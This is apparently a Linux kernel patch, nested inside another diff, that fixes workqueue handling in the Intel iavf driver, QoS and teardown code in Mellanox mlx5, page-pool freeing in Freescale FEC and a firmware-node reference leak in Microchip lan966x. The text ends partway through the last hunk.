+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index f250b0df27fbb..6f914180f4797 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -3089,7 +3089,7 @@ static void fec_enet_free_buffers(struct net_device *ndev)
+ 	for (q = 0; q < fep->num_rx_queues; q++) {
+ 		rxq = fep->rx_queue[q];
+ 		for (i = 0; i < rxq->bd.ring_size; i++)
+-			page_pool_release_page(rxq->page_pool, rxq->rx_skb_info[i].page);
++			page_pool_put_full_page(rxq->page_pool, rxq->rx_skb_info[i].page, false);
+ 
+ 		if (xdp_rxq_info_is_reg(&rxq->xdp_rxq))
+ 			xdp_rxq_info_unreg(&rxq->xdp_rxq);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 0d1bab4ac1b07..2a9f1eeeb7015 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -249,6 +249,7 @@ struct iavf_cloud_filter {
+ 
+ /* board specific private data structure */
+ struct iavf_adapter {
++	struct workqueue_struct *wq;
+ 	struct work_struct reset_task;
+ 	struct work_struct adminq_task;
+ 	struct delayed_work client_task;
+@@ -459,7 +460,6 @@ struct iavf_device {
+ 
+ /* needed by iavf_ethtool.c */
+ extern char iavf_driver_name[];
+-extern struct workqueue_struct *iavf_wq;
+ 
+ static inline const char *iavf_state_str(enum iavf_state_t state)
+ {
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+index a056e15456153..83cfc54a47062 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+@@ -532,7 +532,7 @@ static int iavf_set_priv_flags(struct net_device *netdev, u32 flags)
+ 	if (changed_flags & IAVF_FLAG_LEGACY_RX) {
+ 		if (netif_running(netdev)) {
+ 			adapter->flags |= IAVF_FLAG_RESET_NEEDED;
+-			queue_work(iavf_wq, &adapter->reset_task);
++			queue_work(adapter->wq, &adapter->reset_task);
+ 		}
+ 	}
+ 
+@@ -672,7 +672,7 @@ static int iavf_set_ringparam(struct net_device *netdev,
+ 
+ 	if (netif_running(netdev)) {
+ 		adapter->flags |= IAVF_FLAG_RESET_NEEDED;
+-		queue_work(iavf_wq, &adapter->reset_task);
++		queue_work(adapter->wq, &adapter->reset_task);
+ 	}
+ 
+ 	return 0;
+@@ -1433,7 +1433,7 @@ static int iavf_add_fdir_ethtool(struct iavf_adapter *adapter, struct ethtool_rx
+ 	adapter->aq_required |= IAVF_FLAG_AQ_ADD_FDIR_FILTER;
+ 	spin_unlock_bh(&adapter->fdir_fltr_lock);
+ 
+-	mod_delayed_work(iavf_wq, &adapter->watchdog_task, 0);
++	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ 
+ ret:
+ 	if (err && fltr)
+@@ -1474,7 +1474,7 @@ static int iavf_del_fdir_ethtool(struct iavf_adapter *adapter, struct ethtool_rx
+ 	spin_unlock_bh(&adapter->fdir_fltr_lock);
+ 
+ 	if (fltr && fltr->state == IAVF_FDIR_FLTR_DEL_REQUEST)
+-		mod_delayed_work(iavf_wq, &adapter->watchdog_task, 0);
++		mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ 
+ 	return err;
+ }
+@@ -1658,7 +1658,7 @@ iavf_set_adv_rss_hash_opt(struct iavf_adapter *adapter,
+ 	spin_unlock_bh(&adapter->adv_rss_lock);
+ 
+ 	if (!err)
+-		mod_delayed_work(iavf_wq, &adapter->watchdog_task, 0);
++		mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ 
+ 	mutex_unlock(&adapter->crit_lock);
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 260c55951c287..3dad834b9b8e5 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -49,7 +49,6 @@ MODULE_DESCRIPTION("Intel(R) Ethernet Adaptive Virtual Function Network Driver")
+ MODULE_LICENSE("GPL v2");
+ 
+ static const struct net_device_ops iavf_netdev_ops;
+-struct workqueue_struct *iavf_wq;
+ 
+ int iavf_status_to_errno(enum iavf_status status)
+ {
+@@ -277,7 +276,7 @@ void iavf_schedule_reset(struct iavf_adapter *adapter)
+ 	if (!(adapter->flags &
+ 	      (IAVF_FLAG_RESET_PENDING | IAVF_FLAG_RESET_NEEDED))) {
+ 		adapter->flags |= IAVF_FLAG_RESET_NEEDED;
+-		queue_work(iavf_wq, &adapter->reset_task);
++		queue_work(adapter->wq, &adapter->reset_task);
+ 	}
+ }
+ 
+@@ -291,7 +290,7 @@ void iavf_schedule_reset(struct iavf_adapter *adapter)
+ void iavf_schedule_request_stats(struct iavf_adapter *adapter)
+ {
+ 	adapter->aq_required |= IAVF_FLAG_AQ_REQUEST_STATS;
+-	mod_delayed_work(iavf_wq, &adapter->watchdog_task, 0);
++	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ }
+ 
+ /**
+@@ -411,7 +410,7 @@ static irqreturn_t iavf_msix_aq(int irq, void *data)
+ 
+ 	if (adapter->state != __IAVF_REMOVE)
+ 		/* schedule work on the private workqueue */
+-		queue_work(iavf_wq, &adapter->adminq_task);
++		queue_work(adapter->wq, &adapter->adminq_task);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -1034,7 +1033,7 @@ int iavf_replace_primary_mac(struct iavf_adapter *adapter,
+ 
+ 	/* schedule the watchdog task to immediately process the request */
+ 	if (f) {
+-		queue_work(iavf_wq, &adapter->watchdog_task.work);
++		mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ 		return 0;
+ 	}
+ 	return -ENOMEM;
+@@ -1257,7 +1256,7 @@ static void iavf_up_complete(struct iavf_adapter *adapter)
+ 	adapter->aq_required |= IAVF_FLAG_AQ_ENABLE_QUEUES;
+ 	if (CLIENT_ENABLED(adapter))
+ 		adapter->flags |= IAVF_FLAG_CLIENT_NEEDS_OPEN;
+-	mod_delayed_work(iavf_wq, &adapter->watchdog_task, 0);
++	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ }
+ 
+ /**
+@@ -1414,7 +1413,7 @@ void iavf_down(struct iavf_adapter *adapter)
+ 		adapter->aq_required |= IAVF_FLAG_AQ_DISABLE_QUEUES;
+ 	}
+ 
+-	mod_delayed_work(iavf_wq, &adapter->watchdog_task, 0);
++	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ }
+ 
+ /**
+@@ -2248,7 +2247,7 @@ iavf_set_vlan_offload_features(struct iavf_adapter *adapter,
+ 
+ 	if (aq_required) {
+ 		adapter->aq_required |= aq_required;
+-		mod_delayed_work(iavf_wq, &adapter->watchdog_task, 0);
++		mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ 	}
+ }
+ 
+@@ -2700,7 +2699,7 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 		adapter->aq_required = 0;
+ 		adapter->current_op = VIRTCHNL_OP_UNKNOWN;
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_work(iavf_wq, &adapter->reset_task);
++		queue_work(adapter->wq, &adapter->reset_task);
+ 		return;
+ 	}
+ 
+@@ -2708,31 +2707,31 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 	case __IAVF_STARTUP:
+ 		iavf_startup(adapter);
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task,
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+ 				   msecs_to_jiffies(30));
+ 		return;
+ 	case __IAVF_INIT_VERSION_CHECK:
+ 		iavf_init_version_check(adapter);
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task,
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+ 				   msecs_to_jiffies(30));
+ 		return;
+ 	case __IAVF_INIT_GET_RESOURCES:
+ 		iavf_init_get_resources(adapter);
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task,
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+ 				   msecs_to_jiffies(1));
+ 		return;
+ 	case __IAVF_INIT_EXTENDED_CAPS:
+ 		iavf_init_process_extended_caps(adapter);
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task,
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+ 				   msecs_to_jiffies(1));
+ 		return;
+ 	case __IAVF_INIT_CONFIG_ADAPTER:
+ 		iavf_init_config_adapter(adapter);
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task,
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+ 				   msecs_to_jiffies(1));
+ 		return;
+ 	case __IAVF_INIT_FAILED:
+@@ -2751,14 +2750,14 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 			adapter->flags |= IAVF_FLAG_PF_COMMS_FAILED;
+ 			iavf_shutdown_adminq(hw);
+ 			mutex_unlock(&adapter->crit_lock);
+-			queue_delayed_work(iavf_wq,
++			queue_delayed_work(adapter->wq,
+ 					   &adapter->watchdog_task, (5 * HZ));
+ 			return;
+ 		}
+ 		/* Try again from failed step*/
+ 		iavf_change_state(adapter, adapter->last_state);
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task, HZ);
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task, HZ);
+ 		return;
+ 	case __IAVF_COMM_FAILED:
+ 		if (test_bit(__IAVF_IN_REMOVE_TASK,
+@@ -2789,13 +2788,14 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 		adapter->aq_required = 0;
+ 		adapter->current_op = VIRTCHNL_OP_UNKNOWN;
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq,
++		queue_delayed_work(adapter->wq,
+ 				   &adapter->watchdog_task,
+ 				   msecs_to_jiffies(10));
+ 		return;
+ 	case __IAVF_RESETTING:
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task, HZ * 2);
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
++				   HZ * 2);
+ 		return;
+ 	case __IAVF_DOWN:
+ 	case __IAVF_DOWN_PENDING:
+@@ -2834,9 +2834,9 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 		adapter->aq_required = 0;
+ 		adapter->current_op = VIRTCHNL_OP_UNKNOWN;
+ 		dev_err(&adapter->pdev->dev, "Hardware reset detected\n");
+-		queue_work(iavf_wq, &adapter->reset_task);
++		queue_work(adapter->wq, &adapter->reset_task);
+ 		mutex_unlock(&adapter->crit_lock);
+-		queue_delayed_work(iavf_wq,
++		queue_delayed_work(adapter->wq,
+ 				   &adapter->watchdog_task, HZ * 2);
+ 		return;
+ 	}
+@@ -2845,12 +2845,13 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 	mutex_unlock(&adapter->crit_lock);
+ restart_watchdog:
+ 	if (adapter->state >= __IAVF_DOWN)
+-		queue_work(iavf_wq, &adapter->adminq_task);
++		queue_work(adapter->wq, &adapter->adminq_task);
+ 	if (adapter->aq_required)
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task,
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+ 				   msecs_to_jiffies(20));
+ 	else
+-		queue_delayed_work(iavf_wq, &adapter->watchdog_task, HZ * 2);
++		queue_delayed_work(adapter->wq, &adapter->watchdog_task,
++				   HZ * 2);
+ }
+ 
+ /**
+@@ -2952,7 +2953,7 @@ static void iavf_reset_task(struct work_struct *work)
+ 	 */
+ 	if (!mutex_trylock(&adapter->crit_lock)) {
+ 		if (adapter->state != __IAVF_REMOVE)
+-			queue_work(iavf_wq, &adapter->reset_task);
++			queue_work(adapter->wq, &adapter->reset_task);
+ 
+ 		goto reset_finish;
+ 	}
+@@ -3116,7 +3117,7 @@ continue_reset:
+ 	bitmap_clear(adapter->vsi.active_cvlans, 0, VLAN_N_VID);
+ 	bitmap_clear(adapter->vsi.active_svlans, 0, VLAN_N_VID);
+ 
+-	mod_delayed_work(iavf_wq, &adapter->watchdog_task, 2);
++	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 2);
+ 
+ 	/* We were running when the reset started, so we need to restore some
+ 	 * state here.
+@@ -3208,7 +3209,7 @@ static void iavf_adminq_task(struct work_struct *work)
+ 		if (adapter->state == __IAVF_REMOVE)
+ 			return;
+ 
+-		queue_work(iavf_wq, &adapter->adminq_task);
++		queue_work(adapter->wq, &adapter->adminq_task);
+ 		goto out;
+ 	}
+ 
+@@ -4349,7 +4350,7 @@ static int iavf_change_mtu(struct net_device *netdev, int new_mtu)
+ 
+ 	if (netif_running(netdev)) {
+ 		adapter->flags |= IAVF_FLAG_RESET_NEEDED;
+-		queue_work(iavf_wq, &adapter->reset_task);
++		queue_work(adapter->wq, &adapter->reset_task);
+ 	}
+ 
+ 	return 0;
+@@ -4898,6 +4899,13 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	hw = &adapter->hw;
+ 	hw->back = adapter;
+ 
++	adapter->wq = alloc_ordered_workqueue("%s", WQ_MEM_RECLAIM,
++					      iavf_driver_name);
++	if (!adapter->wq) {
++		err = -ENOMEM;
++		goto err_alloc_wq;
++	}
++
+ 	adapter->msg_enable = BIT(DEFAULT_DEBUG_LEVEL_SHIFT) - 1;
+ 	iavf_change_state(adapter, __IAVF_STARTUP);
+ 
+@@ -4942,7 +4950,7 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	INIT_WORK(&adapter->adminq_task, iavf_adminq_task);
+ 	INIT_DELAYED_WORK(&adapter->watchdog_task, iavf_watchdog_task);
+ 	INIT_DELAYED_WORK(&adapter->client_task, iavf_client_task);
+-	queue_delayed_work(iavf_wq, &adapter->watchdog_task,
++	queue_delayed_work(adapter->wq, &adapter->watchdog_task,
+ 			   msecs_to_jiffies(5 * (pdev->devfn & 0x07)));
+ 
+ 	/* Setup the wait queue for indicating transition to down status */
+@@ -4954,6 +4962,8 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	return 0;
+ 
+ err_ioremap:
++	destroy_workqueue(adapter->wq);
++err_alloc_wq:
+ 	free_netdev(netdev);
+ err_alloc_etherdev:
+ 	pci_disable_pcie_error_reporting(pdev);
+@@ -5023,7 +5033,7 @@ static int __maybe_unused iavf_resume(struct device *dev_d)
+ 		return err;
+ 	}
+ 
+-	queue_work(iavf_wq, &adapter->reset_task);
++	queue_work(adapter->wq, &adapter->reset_task);
+ 
+ 	netif_device_attach(adapter->netdev);
+ 
+@@ -5170,6 +5180,8 @@ static void iavf_remove(struct pci_dev *pdev)
+ 	}
+ 	spin_unlock_bh(&adapter->adv_rss_lock);
+ 
++	destroy_workqueue(adapter->wq);
++
+ 	free_netdev(netdev);
+ 
+ 	pci_disable_pcie_error_reporting(pdev);
+@@ -5196,24 +5208,11 @@ static struct pci_driver iavf_driver = {
+  **/
+ static int __init iavf_init_module(void)
+ {
+-	int ret;
+-
+ 	pr_info("iavf: %s\n", iavf_driver_string);
+ 
+ 	pr_info("%s\n", iavf_copyright);
+ 
+-	iavf_wq = alloc_workqueue("%s", WQ_UNBOUND | WQ_MEM_RECLAIM, 1,
+-				  iavf_driver_name);
+-	if (!iavf_wq) {
+-		pr_err("%s: Failed to create workqueue\n", iavf_driver_name);
+-		return -ENOMEM;
+-	}
+-
+-	ret = pci_register_driver(&iavf_driver);
+-	if (ret)
+-		destroy_workqueue(iavf_wq);
+-
+-	return ret;
++	return pci_register_driver(&iavf_driver);
+ }
+ 
+ module_init(iavf_init_module);
+@@ -5227,7 +5226,6 @@ module_init(iavf_init_module);
+ static void __exit iavf_exit_module(void)
+ {
+ 	pci_unregister_driver(&iavf_driver);
+-	destroy_workqueue(iavf_wq);
+ }
+ 
+ module_exit(iavf_exit_module);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 24a701fd140e9..0752fd67c96e5 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -1952,7 +1952,7 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 			if (!(adapter->flags & IAVF_FLAG_RESET_PENDING)) {
+ 				adapter->flags |= IAVF_FLAG_RESET_PENDING;
+ 				dev_info(&adapter->pdev->dev, "Scheduling reset task\n");
+-				queue_work(iavf_wq, &adapter->reset_task);
++				queue_work(adapter->wq, &adapter->reset_task);
+ 			}
+ 			break;
+ 		default:
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/htb.c b/drivers/net/ethernet/mellanox/mlx5/core/en/htb.c
+index 6dac76fa58a3f..09d441ecb9f6d 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/htb.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/htb.c
+@@ -637,7 +637,7 @@ mlx5e_htb_update_children(struct mlx5e_htb *htb, struct mlx5e_qos_node *node,
+ 		if (child->bw_share == old_bw_share)
+ 			continue;
+ 
+-		err_one = mlx5_qos_update_node(htb->mdev, child->hw_id, child->bw_share,
++		err_one = mlx5_qos_update_node(htb->mdev, child->bw_share,
+ 					       child->max_average_bw, child->hw_id);
+ 		if (!err && err_one) {
+ 			err = err_one;
+@@ -671,7 +671,7 @@ mlx5e_htb_node_modify(struct mlx5e_htb *htb, u16 classid, u64 rate, u64 ceil,
+ 	mlx5e_htb_convert_rate(htb, rate, node->parent, &bw_share);
+ 	mlx5e_htb_convert_ceil(htb, ceil, &max_average_bw);
+ 
+-	err = mlx5_qos_update_node(htb->mdev, node->parent->hw_id, bw_share,
++	err = mlx5_qos_update_node(htb->mdev, bw_share,
+ 				   max_average_bw, node->hw_id);
+ 	if (err) {
+ 		NL_SET_ERR_MSG_MOD(extack, "Firmware error when modifying a node.");
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
+index 1cbd2eb9d04f9..f2c2c752bd1c3 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
+@@ -477,7 +477,6 @@ mlx5e_tc_sample_offload(struct mlx5e_tc_psample *tc_psample,
+ 	struct mlx5e_sample_flow *sample_flow;
+ 	struct mlx5e_sample_attr *sample_attr;
+ 	struct mlx5_flow_attr *pre_attr;
+-	u32 tunnel_id = attr->tunnel_id;
+ 	struct mlx5_eswitch *esw;
+ 	u32 default_tbl_id;
+ 	u32 obj_id;
+@@ -522,7 +521,7 @@ mlx5e_tc_sample_offload(struct mlx5e_tc_psample *tc_psample,
+ 	restore_obj.sample.group_id = sample_attr->group_num;
+ 	restore_obj.sample.rate = sample_attr->rate;
+ 	restore_obj.sample.trunc_size = sample_attr->trunc_size;
+-	restore_obj.sample.tunnel_id = tunnel_id;
++	restore_obj.sample.tunnel_id = attr->tunnel_id;
+ 	err = mapping_add(esw->offloads.reg_c0_obj_pool, &restore_obj, &obj_id);
+ 	if (err)
+ 		goto err_obj_id;
+@@ -548,7 +547,7 @@ mlx5e_tc_sample_offload(struct mlx5e_tc_psample *tc_psample,
+ 	/* For decap action, do decap in the original flow table instead of the
+ 	 * default flow table.
+ 	 */
+-	if (tunnel_id)
++	if (attr->action & MLX5_FLOW_CONTEXT_ACTION_DECAP)
+ 		pre_attr->action |= MLX5_FLOW_CONTEXT_ACTION_DECAP;
+ 	pre_attr->modify_hdr = sample_flow->restore->modify_hdr;
+ 	pre_attr->flags = MLX5_ATTR_FLAG_SAMPLE;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+index 4c313b7424bf5..c1cf3917baa43 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+@@ -157,6 +157,7 @@ struct mlx5_fs_chains *mlx5e_nic_chains(struct mlx5e_tc_table *tc)
+  * it's different than the ht->mutex here.
+  */
+ static struct lock_class_key tc_ht_lock_key;
++static struct lock_class_key tc_ht_wq_key;
+ 
+ static void mlx5e_put_flow_tunnel_id(struct mlx5e_tc_flow *flow);
+ static void free_flow_post_acts(struct mlx5e_tc_flow *flow);
+@@ -4971,6 +4972,7 @@ int mlx5e_tc_nic_init(struct mlx5e_priv *priv)
+ 		return err;
+ 
+ 	lockdep_set_class(&tc->ht.mutex, &tc_ht_lock_key);
++	lockdep_init_map(&tc->ht.run_work.lockdep_map, "tc_ht_wq_key", &tc_ht_wq_key, 0);
+ 
+ 	mapping_id = mlx5_query_nic_system_image_guid(dev);
+ 
+@@ -5077,6 +5079,7 @@ int mlx5e_tc_ht_init(struct rhashtable *tc_ht)
+ 		return err;
+ 
+ 	lockdep_set_class(&tc_ht->mutex, &tc_ht_lock_key);
++	lockdep_init_map(&tc_ht->run_work.lockdep_map, "tc_ht_wq_key", &tc_ht_wq_key, 0);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c
+index 4f8a24d84a86a..75015d370922e 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c
+@@ -22,15 +22,13 @@ struct mlx5_esw_rate_group {
+ };
+ 
+ static int esw_qos_tsar_config(struct mlx5_core_dev *dev, u32 *sched_ctx,
+-			       u32 parent_ix, u32 tsar_ix,
+-			       u32 max_rate, u32 bw_share)
++			       u32 tsar_ix, u32 max_rate, u32 bw_share)
+ {
+ 	u32 bitmask = 0;
+ 
+ 	if (!MLX5_CAP_GEN(dev, qos) || !MLX5_CAP_QOS(dev, esw_scheduling))
+ 		return -EOPNOTSUPP;
+ 
+-	MLX5_SET(scheduling_context, sched_ctx, parent_element_id, parent_ix);
+ 	MLX5_SET(scheduling_context, sched_ctx, max_average_bw, max_rate);
+ 	MLX5_SET(scheduling_context, sched_ctx, bw_share, bw_share);
+ 	bitmask |= MODIFY_SCHEDULING_ELEMENT_IN_MODIFY_BITMASK_MAX_AVERAGE_BW;
+@@ -51,7 +49,7 @@ static int esw_qos_group_config(struct mlx5_eswitch *esw, struct mlx5_esw_rate_g
+ 	int err;
+ 
+ 	err = esw_qos_tsar_config(dev, sched_ctx,
+-				  esw->qos.root_tsar_ix, group->tsar_ix,
++				  group->tsar_ix,
+ 				  max_rate, bw_share);
+ 	if (err)
+ 		NL_SET_ERR_MSG_MOD(extack, "E-Switch modify group TSAR element failed");
+@@ -67,23 +65,13 @@ static int esw_qos_vport_config(struct mlx5_eswitch *esw,
+ 				struct netlink_ext_ack *extack)
+ {
+ 	u32 sched_ctx[MLX5_ST_SZ_DW(scheduling_context)] = {};
+-	struct mlx5_esw_rate_group *group = vport->qos.group;
+ 	struct mlx5_core_dev *dev = esw->dev;
+-	u32 parent_tsar_ix;
+-	void *vport_elem;
+ 	int err;
+ 
+ 	if (!vport->qos.enabled)
+ 		return -EIO;
+ 
+-	parent_tsar_ix = group ? group->tsar_ix : esw->qos.root_tsar_ix;
+-	MLX5_SET(scheduling_context, sched_ctx, element_type,
+-		 SCHEDULING_CONTEXT_ELEMENT_TYPE_VPORT);
+-	vport_elem = MLX5_ADDR_OF(scheduling_context, sched_ctx,
+-				  element_attributes);
+-	MLX5_SET(vport_element, vport_elem, vport_number, vport->vport);
+-
+-	err = esw_qos_tsar_config(dev, sched_ctx, parent_tsar_ix, vport->qos.esw_tsar_ix,
++	err = esw_qos_tsar_config(dev, sched_ctx, vport->qos.esw_tsar_ix,
+ 				  max_rate, bw_share);
+ 	if (err) {
+ 		esw_warn(esw->dev,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+index 788a6ab5c4636..43ba00d5e36ec 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+@@ -1421,6 +1421,7 @@ void mlx5_eswitch_disable(struct mlx5_eswitch *esw)
+ 	mlx5_lag_disable_change(esw->dev);
+ 	down_write(&esw->mode_lock);
+ 	mlx5_eswitch_disable_locked(esw);
++	esw->mode = MLX5_ESWITCH_LEGACY;
+ 	up_write(&esw->mode_lock);
+ 	mlx5_lag_enable_change(esw->dev);
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index 00758312df065..d4db1adae3e3d 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -2082,7 +2082,7 @@ static void mlx5_core_verify_params(void)
+ 	}
+ }
+ 
+-static int __init init(void)
++static int __init mlx5_init(void)
+ {
+ 	int err;
+ 
+@@ -2117,7 +2117,7 @@ err_debug:
+ 	return err;
+ }
+ 
+-static void __exit cleanup(void)
++static void __exit mlx5_cleanup(void)
+ {
+ 	mlx5e_cleanup();
+ 	mlx5_sf_driver_unregister();
+@@ -2125,5 +2125,5 @@ static void __exit cleanup(void)
+ 	mlx5_unregister_debugfs();
+ }
+ 
+-module_init(init);
+-module_exit(cleanup);
++module_init(mlx5_init);
++module_exit(mlx5_cleanup);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/qos.c b/drivers/net/ethernet/mellanox/mlx5/core/qos.c
+index 0777be24a3074..8bce730b5c5be 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/qos.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/qos.c
+@@ -62,13 +62,12 @@ int mlx5_qos_create_root_node(struct mlx5_core_dev *mdev, u32 *id)
+ 	return mlx5_qos_create_inner_node(mdev, MLX5_QOS_DEFAULT_DWRR_UID, 0, 0, id);
+ }
+ 
+-int mlx5_qos_update_node(struct mlx5_core_dev *mdev, u32 parent_id,
++int mlx5_qos_update_node(struct mlx5_core_dev *mdev,
+ 			 u32 bw_share, u32 max_avg_bw, u32 id)
+ {
+ 	u32 sched_ctx[MLX5_ST_SZ_DW(scheduling_context)] = {0};
+ 	u32 bitmask = 0;
+ 
+-	MLX5_SET(scheduling_context, sched_ctx, parent_element_id, parent_id);
+ 	MLX5_SET(scheduling_context, sched_ctx, bw_share, bw_share);
+ 	MLX5_SET(scheduling_context, sched_ctx, max_average_bw, max_avg_bw);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/qos.h b/drivers/net/ethernet/mellanox/mlx5/core/qos.h
+index 125e4e47e6f71..624ce822b7f59 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/qos.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/qos.h
+@@ -23,7 +23,7 @@ int mlx5_qos_create_leaf_node(struct mlx5_core_dev *mdev, u32 parent_id,
+ int mlx5_qos_create_inner_node(struct mlx5_core_dev *mdev, u32 parent_id,
+ 			       u32 bw_share, u32 max_avg_bw, u32 *id);
+ int mlx5_qos_create_root_node(struct mlx5_core_dev *mdev, u32 *id);
+-int mlx5_qos_update_node(struct mlx5_core_dev *mdev, u32 parent_id, u32 bw_share,
++int mlx5_qos_update_node(struct mlx5_core_dev *mdev, u32 bw_share,
+ 			 u32 max_avg_bw, u32 id);
+ int mlx5_qos_destroy_node(struct mlx5_core_dev *mdev, u32 id);
+ 
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_main.c b/drivers/net/ethernet/microchip/lan966x/lan966x_main.c
+index 20ee5b28f70a5..569108c49cbc5 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_main.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_main.c
+@@ -1022,11 +1022,6 @@ static int lan966x_probe(struct platform_device *pdev)
+ 		lan966x->base_mac[5] &= 0xf0;
+ 	}
+ 
+-	ports = device_get_named_child_node(&pdev->dev, "ethernet-ports");
+-	if (!ports)
+-		return dev_err_probe(&pdev->dev, -ENODEV,
+-				     "no ethernet-ports child found\n");
+-
+ 	err = lan966x_create_targets(pdev, lan966x);
+ 	if (err)
+ 		return dev_err_probe(&pdev->dev, err,
+@@ -1104,6 +1099,11 @@ static int lan966x_probe(struct platform_device *pdev)
+ 		}
+ 	}
+ 
++	ports = device_get_named_child_node(&pdev->dev, "ethernet-ports");
++	if (!ports)
++		return dev_err_probe(&pdev->dev, -ENODEV,
++				     "no ethernet-ports child found\n");
++
+ 	/* init switch */
+ 	lan966x_init(lan966x);
+ 	lan966x_stats_init(lan966x);
+@@ -1138,6 +1138,8 @@ static int lan966x_probe(struct platform_device *pdev)
+ 		lan966x_port_init(lan966x->ports[p]);
+ 	}
+ 
++	fwnode_handle_put(ports);
++
+ 	lan966x_mdb_init(lan966x);
+ 	err = lan966x_fdb_init(lan966x);
+ 	if (err)
+@@ -1160,6 +1162,7 @@ cleanup_fdb:
+ 	lan966x_fdb_deinit(lan966x);
+ 
+ cleanup_ports:
++	fwnode_handle_put(ports);
